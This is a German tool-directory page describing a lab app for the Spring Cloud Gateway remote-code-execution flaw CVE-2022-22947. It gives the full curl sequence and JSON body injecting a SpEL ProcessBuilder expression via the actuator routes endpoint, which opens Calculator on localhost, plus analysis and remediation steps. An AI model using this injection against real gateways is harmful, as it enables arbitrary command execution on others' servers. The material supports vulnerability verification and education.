Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/skysliently/cve-2022-22947-pb-ai
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationAPI-SicherheitstestsLernen & Bildung
GitHubskysliently/cve-2022-22947-pb-ai

CVE-2022-22947-pb-ai

Eine KI-generierte Anwendung zur Schwachstellenverifikation

Repository anzeigen
5vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-22947 Spring Cloud Gateway – Anwendung zur Verifizierung der Schwachstelle

Dies ist eine Spring Cloud Gateway-Anwendung, die speziell zur Demonstration und Verifizierung der Schwachstelle CVE-2022-22947 entwickelt wurde. Die Anwendung verwendet eine anfällige Version von Spring Cloud Gateway und ermöglicht die Ausführung beliebigen Codes über den Actuator-Endpunkt.

Schwachstellenübersicht

CVE-2022-22947 ist eine Schwachstelle zur Remote-Codeausführung in Spring Cloud Gateway. Ein Angreifer kann über den Actuator-Endpunkt dynamisch Routen hinzufügen, die bösartige SpEL-Ausdrücke enthalten, um beliebigen Code auszuführen.

Umgebungsanforderungen

  • Java 11+
  • Maven 3.6+
  • macOS-System (für die Taschenrechner-Demonstration)

Anwendung starten

root@kitploit:~
mvn spring-boot:run

Die Anwendung wird unter http://localhost:8080 gestartet.

Schritte zur Verifizierung der Schwachstelle

Schritt 1: Bösartige Route hinzufügen

Senden Sie eine POST-Anfrage an den Endpunkt /actuator/gateway/routes/test, um eine Route mit einem bösartigen SpEL-Ausdruck hinzuzufügen:

root@kitploit:~
curl -X POST http://localhost:8080/actuator/gateway/routes/test \
  -H "Content-Type: application/json" \
  -d '{
    "id": "test",
    "filters": [
      {
        "name": "AddResponseHeader",
        "args": {
          "name": "Result",
          "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
        }
      }
    ],
    "uri": "http://example.com",
    "predicates": [
      {
        "name": "Path",
        "args": {
          "_genkey_0": "/test"
        }
      }
    ]
  }'

Schritt 2: Routen aktualisieren

Senden Sie eine POST-Anfrage an den Endpunkt /actuator/gateway/refresh, um die Routen zu aktualisieren:

root@kitploit:~
curl -X POST http://localhost:8080/actuator/gateway/refresh

Schritt 3: Bösartigen Code auslösen

Rufen Sie die bösartige Route auf, um die Codeausführung auszulösen:

root@kitploit:~
curl http://localhost:8080/test

Erwartetes Ergebnis

Nach erfolgreicher Ausnutzung der Schwachstelle wird die macOS-Taschenrechner-Anwendung gestartet.

Wichtige Anfrageinformationen

1. Anfrage zum Hinzufügen einer bösartigen Route

Endpunkt: POST /actuator/gateway/routes/test

Anfrage-Header:

root@kitploit:~
Content-Type: application/json

Anfrage-Body:

root@kitploit:~
{
  "id": "test",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "Result",
        "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
      }
    }
  ],
  "uri": "http://example.com",
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/test"
      }
    }
  ]
}

2. Anfrage zum Aktualisieren der Routen

Endpunkt: POST /actuator/gateway/refresh

3. Anfrage zum Auslösen der Schwachstelle

Endpunkt: GET /test

Schwachstellenanalyse

Diese Schwachstelle ermöglicht es einem Angreifer, über Actuator-Endpunkte dynamisch Routen hinzuzufügen und mithilfe von SpEL-Ausdrücken in den Routenfiltern beliebigen Code auszuführen. Der Kern der Schwachstelle liegt in der unsachgemäßen Verarbeitung von SpEL-Ausdrücken in der Routenkonfiguration durch Spring Cloud Gateway.

Empfehlungen zur Behebung

  1. Upgrade auf Spring Cloud Gateway 3.1.1+ oder 3.0.7+
  2. Deaktivieren Sie die Actuator-Endpunkte oder schränken Sie den Zugriff ein
  3. Schützen Sie die Actuator-Endpunkte mit Spring Security

Versionsinformationen

  • Spring Boot: 2.6.2
  • Spring Cloud: 2021.0.0
  • Spring Cloud Gateway: 3.1.0 (anfällige Version)

Hinweise

⚠️ Sicherheitswarnung: Diese Anwendung dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Verwenden oder deployen Sie diese Anwendung nicht in Produktionsumgebungen.

⚠️ Rechtlicher Hinweis: Stellen Sie sicher, dass Sie über die entsprechende Genehmigung verfügen, bevor Sie diese Anwendung für Schwachstellentests verwenden. Nicht autorisierte Tests können gegen Gesetze und Vorschriften verstoßen.

Tool herunterladen